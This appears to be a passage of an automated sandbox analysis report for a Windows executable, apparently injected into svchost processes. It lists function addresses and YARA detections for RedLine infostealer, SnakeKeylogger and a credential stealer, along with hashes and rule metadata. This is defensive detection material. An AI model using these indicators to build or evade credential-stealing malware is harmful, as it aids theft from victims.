              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0041A2170_2_0041A217
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004122160_2_00412216
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0042435D0_2_0042435D
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004033C00_2_004033C0
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0044F4300_2_0044F430
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004125E80_2_004125E8
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0044663B0_2_0044663B
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004138010_2_00413801
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0042096F0_2_0042096F
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004129D00_2_004129D0
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004119E30_2_004119E3
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0041C9AE0_2_0041C9AE
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0047EA6F0_2_0047EA6F
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0040FA100_2_0040FA10
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0044EB5F0_2_0044EB5F
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00423C810_2_00423C81
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00411E780_2_00411E78
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00442E0C0_2_00442E0C
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00420EC00_2_00420EC0
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0044CF170_2_0044CF17
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00444FD20_2_00444FD2
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_03DBE0A80_2_03DBE0A8
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_03DBA6A00_2_03DBA6A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00408C604_2_00408C60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040DC114_2_0040DC11
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00407C3F4_2_00407C3F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00418CCC4_2_00418CCC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00406CA04_2_00406CA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004028B04_2_004028B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041A4BE4_2_0041A4BE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004182444_2_00418244
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004016504_2_00401650
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00402F204_2_00402F20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004193C44_2_004193C4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004187884_2_00418788
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00402F894_2_00402F89
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00402B904_2_00402B90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004073A04_2_004073A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0791D7B84_2_0791D7B8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_079176304_2_07917630
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0791A5984_2_0791A598
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0791C4E04_2_0791C4E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0791D4EB4_2_0791D4EB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0791D20B4_2_0791D20B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0791CF304_2_0791CF30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_07916EA84_2_07916EA8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_07912EF84_2_07912EF8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0791EEE04_2_0791EEE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0791CC584_2_0791CC58
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0791C9804_2_0791C980
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0791586F4_2_0791586F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0791C6A84_2_0791C6A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_079143114_2_07914311
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0791EED04_2_0791EED0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AE0504_2_082AE050
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A4E684_2_082A4E68
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A9EC04_2_082A9EC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AD3484_2_082AD348
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A93984_2_082A9398
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AE03F4_2_082AE03F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AE4A84_2_082AE4A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AE49D4_2_082AE49D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AE8F04_2_082AE8F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A20CA4_2_082A20CA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A20D84_2_082A20D8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AE9004_2_082AE900
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A0D6F4_2_082A0D6F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A91784_2_082A9178
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A0D704_2_082A0D70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AED494_2_082AED49
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AED584_2_082AED58
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AF1A04_2_082AF1A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AF1B04_2_082AF1B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A89E04_2_082A89E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A19F04_2_082A19F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AF5F74_2_082AF5F7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A19DF4_2_082A19DF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A89DF4_2_082A89DF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AF6084_2_082AF608
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AFA604_2_082AFA60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A4E674_2_082A4E67
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A02734_2_082A0273
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AFA5D4_2_082AFA5D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A9EBF4_2_082A9EBF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A02804_2_082A0280
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082ACEE04_2_082ACEE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082ACEF04_2_082ACEF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AD3394_2_082AD339
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AD7A04_2_082AD7A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A27B24_2_082A27B2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082AD7904_2_082AD790
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082ADBF84_2_082ADBF8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082ADBF54_2_082ADBF5
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A27C04_2_082A27C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_092AC4B84_2_092AC4B8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_092A268C4_2_092A268C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00408C607_2_00408C60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040DC117_2_0040DC11
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00407C3F7_2_00407C3F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00418CCC7_2_00418CCC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00406CA07_2_00406CA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004028B07_2_004028B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041A4BE7_2_0041A4BE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004182447_2_00418244
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004016507_2_00401650
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402F207_2_00402F20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004193C47_2_004193C4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004187887_2_00418788
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402F897_2_00402F89
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402B907_2_00402B90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004073A07_2_004073A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053CA5987_2_053CA598
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053CD4EA7_2_053CD4EA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053C74E07_2_053C74E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053CC4E07_2_053CC4E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053CD7B87_2_053CD7B8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053CD20A7_2_053CD20A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053CCC587_2_053CCC58
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053CCF307_2_053CCF30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053C6EA87_2_053C6EA8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053C2EF87_2_053C2EF8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053CEEE07_2_053CEEE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053CC9807_2_053CC980
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053C586F7_2_053C586F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053CC6A87_2_053CC6A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053C43117_2_053C4311
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053CEED07_2_053CEED0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873FA607_2_0873FA60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_08734E687_2_08734E68
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_08739EC07_2_08739EC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_087393987_2_08739398
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873E0507_2_0873E050
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873E03F7_2_0873E03F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873E8F07_2_0873E8F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_087320D87_2_087320D8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_087320CA7_2_087320CA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873E4A87_2_0873E4A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873E49D7_2_0873E49D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_08730D707_2_08730D70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_087391787_2_08739178
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_08730D607_2_08730D60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873ED587_2_0873ED58
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873ED497_2_0873ED49
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873E9007_2_0873E900
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_087319F07_2_087319F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873F5F77_2_0873F5F7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_087389E07_2_087389E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_087389D07_2_087389D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_087319DF7_2_087319DF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873F1B07_2_0873F1B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873F1A07_2_0873F1A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_087302717_2_08730271
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_087302747_2_08730274
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873FA547_2_0873FA54
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_08734E587_2_08734E58
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_08739E477_2_08739E47
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873F6087_2_0873F608
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873CEF07_2_0873CEF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873CEE07_2_0873CEE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_08739EB07_2_08739EB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_087302807_2_08730280
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873D3487_2_0873D348
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873D3387_2_0873D338
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873DBF87_2_0873DBF8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873DBE87_2_0873DBE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_087327C07_2_087327C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_087327BA7_2_087327BA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873D7A07_2_0873D7A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0873D7907_2_0873D790
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0987C4B87_2_0987C4B8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0987268C7_2_0987268C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0040D606 appears 48 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0040E1D8 appears 88 times
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: String function: 004115D7 appears 36 times
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: String function: 00416C70 appears 39 times
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: String function: 00445AE0 appears 65 times
              Source: kG713MWffq.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 4.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 7.2.svchost.exe.8140f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 7.2.svchost.exe.8140f20.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 7.2.svchost.exe.8140f20.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 7.3.svchost.exe.366c000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.svchost.exe.7990000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 7.3.svchost.exe.366c000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.svchost.exe.7990000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 7.3.svchost.exe.366c000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.svchost.exe.7990000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 7.3.svchost.exe.366cf20.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.svchost.exe.7990000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 7.3.svchost.exe.366cf20.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.svchost.exe.7990000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 7.3.svchost.exe.366cf20.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.svchost.exe.7990000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.svchost.exe.7990f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.svchost.exe.7990f20.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 7.2.svchost.exe.81e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
